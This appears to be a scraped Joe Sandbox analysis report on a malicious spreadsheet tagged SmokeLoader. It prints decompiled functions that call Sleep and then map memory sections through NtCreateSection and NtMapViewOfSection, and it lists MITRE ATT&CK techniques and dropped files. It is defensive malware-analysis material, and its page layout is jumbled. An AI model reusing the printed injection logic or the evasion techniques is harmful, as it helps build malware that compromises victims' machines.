Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2aa3994a2248ca89c3481aa428b1324e317f3b8c2e15ca7f2b31f40a7e2db61f
Instruction ID: 24c392a411cf437f8c2e061dd1409c5534f210dcce273ca075fca37c15b207fc
Opcode Fuzzy Hash: 2aa3994a2248ca89c3481aa428b1324e317f3b8c2e15ca7f2b31f40a7e2db61f
Instruction Fuzzy Hash: E401F7B2308248FBDB006AD49D91DBA33A99B41710F200537B683790F1D57D9912EB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004019A1 Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E004019A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				void* _t19;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("lock int 0xc6");
				asm("out 0x34, eax");
				_push(0x19cf);
				_t8 =  *_t27;
				_t28 = _t27 + 4;
				_t19 = 0x61;
				L004012ED(_t8, __ebx, _t19, __edi, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_t11 = L00401522(_t25 - 4, _t17, _t31, _t17,  *((intOrPtr*)(_t25 + 0xc))); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					E004015EB(_t32, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t28;
				return L004012ED(_t13, _t17, 0x61, _t21, _t23, _t32);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 48abe0e5e916fcf01cacac71bf3fb9758dc1c70dd5011dce89efb9d5383521dc
Instruction ID: 21294f5f63950678430cba152632e7c12a5c10d2d465431cb89b6dd7cc50de4e
Opcode Fuzzy Hash: 48abe0e5e916fcf01cacac71bf3fb9758dc1c70dd5011dce89efb9d5383521dc
Instruction Fuzzy Hash: FE01D672308284FBDB006AD49C91DB933A59B44710F200577F693B90F1C57D8912AB2F

Uniqueness

Uniqueness Score: -1.00%

Function 004019B4 Relevance: 1.3, APIs: 1, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E004019B4(signed int __ebx, signed int __ecx, void* __edi, void* __esi) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t18;
				void* _t21;
				void* _t27;
				intOrPtr* _t29;
				intOrPtr* _t30;
				signed char _t33;

				_t25 = __esi;
				_t23 = __edi;
				_t17 = __ebx & __ecx;
				_t33 = __ebx & __ecx;
				_push(0x19cf);
				_t8 =  *_t29;
				_t30 = _t29 + 4;
				_t21 = 0x61;
				L004012ED(_t8, _t17, _t21, __edi, __esi, _t33);
				_t18 =  *((intOrPtr*)(_t27 + 8));
				Sleep(0x1388);
				_push(_t27 - 4);
				_push( *((intOrPtr*)(_t27 + 0x10)));
				_t11 = L00401522(_t27 - 4, _t18, _t33, _t18,  *((intOrPtr*)(_t27 + 0xc))); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					E004015EB(_t34, _t18, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t30;
				return L004012ED(_t13, _t18, 0x61, _t23, _t25, _t34);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: ff8b0466e8b9a07ac2027ad4c9a252600819c1965c523a4f913306aebf181b9f
Instruction ID: 0e5d671145175133b10e5a8ab281a39b469cb3f87768d2fb331155c0ff2a7710
Opcode Fuzzy Hash: ff8b0466e8b9a07ac2027ad4c9a252600819c1965c523a4f913306aebf181b9f
Instruction Fuzzy Hash: C5F0A432349246FBDB01AED4DC91EAD33A59B40310F20047BB653FA0E1D67DC912AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019C5 Relevance: 1.3, APIs: 1, Instructions: 42
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004019C5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				void* _t19;
				void* _t25;
				void* _t27;
				intOrPtr* _t29;

				_t32 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				_t29 = _t27 + 1 - 1;
				_t19 = 0x61;
				L004012ED(_t8, __ebx, _t19, __edi, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_t11 = L00401522(_t25 - 4, _t17, _t32, _t17,  *((intOrPtr*)(_t25 + 0xc))); // executed
				_t33 = _t11;
				if(_t11 != 0) {
					E004015EB(_t33, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t29;
				return L004012ED(_t13, _t17, 0x61, _t21, _t23, _t33);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: ecc63529a8df23c14f7036961a240bf8bd8ca2361d037dcff9b7a36a2e04d9f5
Instruction ID: a5ce4ed59abcd09e83e148daddf3c5cf74a52f34f12c25f43b8373eb0755b928
Opcode Fuzzy Hash: ecc63529a8df23c14f7036961a240bf8bd8ca2361d037dcff9b7a36a2e04d9f5
Instruction Fuzzy Hash: 4DF0C272308244FBDB006ED49C81EAD33A59B40710F200477B653B80F1C57D8922AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019C9 Relevance: 1.3, APIs: 1, Instructions: 37
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E004019C9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				void* _t25;
				intOrPtr* _t27;

				_t30 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("cmc");
				L004012ED(_t8, __ebx, __ecx, __edi, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_t11 = L00401522(_t25 - 4, _t17, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc))); // executed
				_t31 = _t11;
				if(_t11 != 0) {
					E004015EB(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t27;
				return L004012ED(_t13, _t17, 0x61, _t21, _t23, _t31);
			}

0x004019c9
0x004019c9
0x004019c9
0x004019c9
0x004019ca
0x004019cf
0x004019d7
0x004019dd
0x004019de
0x004019e5
0x004019ea
0x004019ec
0x004019f6
0x004019f6
0x004019ff
0x00401a08
0x00401a0d
0x00401a34

APIs

Sleep.KERNELBASE(00001388), ref: 004019D7

Part of subcall function 004015EB: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
Part of subcall function 004015EB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
Part of subcall function 004015EB: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 0e4832ae9175ffecd7412843673cfb81c6e930cec8928ebf691fc2893bb779ee
Instruction ID: 650a10402776a7326af24cc711a21d3f22586efd6f7ee03a7f70e365e26de698
Opcode Fuzzy Hash: 0e4832ae9175ffecd7412843673cfb81c6e930cec8928ebf691fc2893bb779ee
Instruction Fuzzy Hash: 5EF09032304245FBDB00AFD49C81AAE33659B44310F200877B653B80E1C63D8912AB2B

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-112030087.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF7385a5.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A36D4.emf

Windows Analysis Report
PO-112030087.xls

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre